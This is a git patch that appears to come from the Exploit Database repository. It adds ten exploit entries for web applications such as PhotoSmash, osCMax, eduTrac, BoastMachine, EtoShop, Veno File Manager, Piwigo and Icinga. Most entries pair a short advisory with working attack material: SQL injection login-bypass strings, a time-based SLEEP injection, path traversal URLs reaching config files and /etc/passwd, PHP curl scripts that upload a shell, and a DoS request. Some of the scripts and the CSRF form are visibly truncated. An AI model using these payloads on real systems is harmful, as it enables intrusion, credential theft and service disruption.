From 04598bf305d9f456cc9a3371a6b6decd76945845 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 7 Dec 2015 05:03:07 +0000 Subject: [PATCH] DB: 2015-12-07 10 new exploits --- files.csv | 10 ++++++++++ platforms/asp/webapps/38879.txt | 12 ++++++++++++ platforms/cgi/webapps/38882.txt | 7 +++++++ platforms/php/webapps/38872.php | 19 +++++++++++++++++++ platforms/php/webapps/38873.txt | 9 +++++++++ platforms/php/webapps/38874.txt | 9 +++++++++ platforms/php/webapps/38875.php | 28 ++++++++++++++++++++++++++++ platforms/php/webapps/38876.txt | 9 +++++++++ platforms/php/webapps/38877.txt | 12 ++++++++++++ platforms/php/webapps/38880.txt | 7 +++++++ platforms/php/webapps/38881.html | 25 +++++++++++++++++++++++++ 11 files changed, 147 insertions(+) create mode 100755 platforms/asp/webapps/38879.txt create mode 100755 platforms/cgi/webapps/38882.txt create mode 100755 platforms/php/webapps/38872.php create mode 100755 platforms/php/webapps/38873.txt create mode 100755 platforms/php/webapps/38874.txt create mode 100755 platforms/php/webapps/38875.php create mode 100755 platforms/php/webapps/38876.txt create mode 100755 platforms/php/webapps/38877.txt create mode 100755 platforms/php/webapps/38880.txt create mode 100755 platforms/php/webapps/38881.html diff --git a/files.csv b/files.csv index c27dc4f57..d7b5aa947 100755 --- a/files.csv +++ b/files.csv @@ -35137,3 +35137,13 @@ id,file,description,date,author,platform,type,port 38869,platforms/php/webapps/38869.txt,"Wordpress Plugin TheCartPress v1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection Vulnerability",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= v8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0 +38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin 'bwbps-uploader.php' Arbitrary File Upload Vulnerability",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 +38873,platforms/php/webapps/38873.txt,"eduTrac 'showmask' Parameter Directory Traversal Vulnerability",2013-12-11,"High-Tech Bridge",php,webapps,0 +38874,platforms/php/webapps/38874.txt,"BoastMachine 'blog' Parameter SQL Injection Vulnerablity",2013-12-13,"Omar Kurt",php,webapps,0 +38875,platforms/php/webapps/38875.php,"osCMax Arbitrary File Upload and Full Path Information Disclosure Vulnerabilities",2013-12-09,KedAns-Dz,php,webapps,0 +38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 +38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator /auction/casp/admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0 +38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator Multiple SQL Injection Vulnerabilities",2013-12-14,R3d-D3V!L,asp,webapps,0 +38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0 +38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0 +38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 diff --git a/platforms/asp/webapps/38879.txt b/platforms/asp/webapps/38879.txt new file mode 100755 index 000000000..d7e8e5cab --- /dev/null +++ b/platforms/asp/webapps/38879.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/64332/info + +B2B Vertical Marketplace Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. + +B2B Vertical Marketplace Creator 2.0 is vulnerable; other version may also be vulnerable. + +www.example.com/demo/B2BVerticalMarketplace/admin.asp + +UserID : 1' or '1' = '1 +Password : 1' or '1' = '1 \ No newline at end of file diff --git a/platforms/cgi/webapps/38882.txt b/platforms/cgi/webapps/38882.txt new file mode 100755 index 000000000..fbaeb0c2d --- /dev/null +++ b/platforms/cgi/webapps/38882.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/64363/info + +Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition. + +Attackers may exploit these issues to gain access to sensitive information or crash the affected application, denying service to legitimate users. + +http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times] \ No newline at end of file diff --git a/platforms/php/webapps/38872.php b/platforms/php/webapps/38872.php new file mode 100755 index 000000000..733e5894b --- /dev/null +++ b/platforms/php/webapps/38872.php @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/64173/info + +The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +"@$uploadfile")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; +?> \ No newline at end of file diff --git a/platforms/php/webapps/38873.txt b/platforms/php/webapps/38873.txt new file mode 100755 index 000000000..3937ab7ce --- /dev/null +++ b/platforms/php/webapps/38873.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/64255/info + +eduTrac is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. + +A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks. + +eduTrac 1.1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php \ No newline at end of file diff --git a/platforms/php/webapps/38874.txt b/platforms/php/webapps/38874.txt new file mode 100755 index 000000000..5504b0861 --- /dev/null +++ b/platforms/php/webapps/38874.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/64278/info + +BoastMachine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://example.com/user.php +(POST - blog) +blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' \ No newline at end of file diff --git a/platforms/php/webapps/38875.php b/platforms/php/webapps/38875.php new file mode 100755 index 000000000..034f3543a --- /dev/null +++ b/platforms/php/webapps/38875.php @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/64307/info + +osCMax is prone to an arbitrary file-upload vulnerability and an information-disclosure vulnerability . + +Attackers can exploit these issues to obtain sensitive information and upload arbitrary files. This may aid in other attacks. + +osCMax 2.5.3 is vulnerable; other versions may also be affected. + +"; # U'r Sh3lL h3re ! +$path ="/temp/"; # Sh3lL Path +#----------------------------------------------------------------------------- +$ch = curl_init("http://www.example.com//oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php"); +curl_setopt($ch, CURLOPT_POST, true); +curl_setopt($ch, CURLOPT_POSTFIELDS, + array('Filedata'=>"@$shell", + 'uploadpath'=>"@$path")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; +#----------------------------------------------------------------------------- +?> diff --git a/platforms/php/webapps/38876.txt b/platforms/php/webapps/38876.txt new file mode 100755 index 000000000..8337f0784 --- /dev/null +++ b/platforms/php/webapps/38876.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/64329/info + +EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. + +EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. + +http://www.example.com/C2CForwardAuction/auction/asp/list.asp?pa=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/38877.txt b/platforms/php/webapps/38877.txt new file mode 100755 index 000000000..078a584a8 --- /dev/null +++ b/platforms/php/webapps/38877.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/64329/info + +EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. + +EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. + +www.example.com/demo/C2CForwardAuction/auction/casp/admin.asp + +UserID : x' or ' 1=1-- +Password : x' or ' 1=1-- \ No newline at end of file diff --git a/platforms/php/webapps/38880.txt b/platforms/php/webapps/38880.txt new file mode 100755 index 000000000..d97eb15dd --- /dev/null +++ b/platforms/php/webapps/38880.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/64346/info + +Veno File Manager is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. + +An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. + +http://www.example.com/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== \ No newline at end of file diff --git a/platforms/php/webapps/38881.html b/platforms/php/webapps/38881.html new file mode 100755 index 000000000..d4641df3f --- /dev/null +++ b/platforms/php/webapps/38881.html @@ -0,0 +1,25 @@ +source: http://www.securityfocus.com/bid/64357/info + +Piwigo is prone to cross-site request-forgery and HTML-injection vulnerabilities. + +Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, execute arbitrary script or HTML code within the context of the browser, and steal cookie-based authentication credentials. Other attacks are also possible. + +Piwigo 2.5.3 is vulnerable; other versions may also be affected. + + +POC + + +
+ + + + + +
+ + + \ No newline at end of file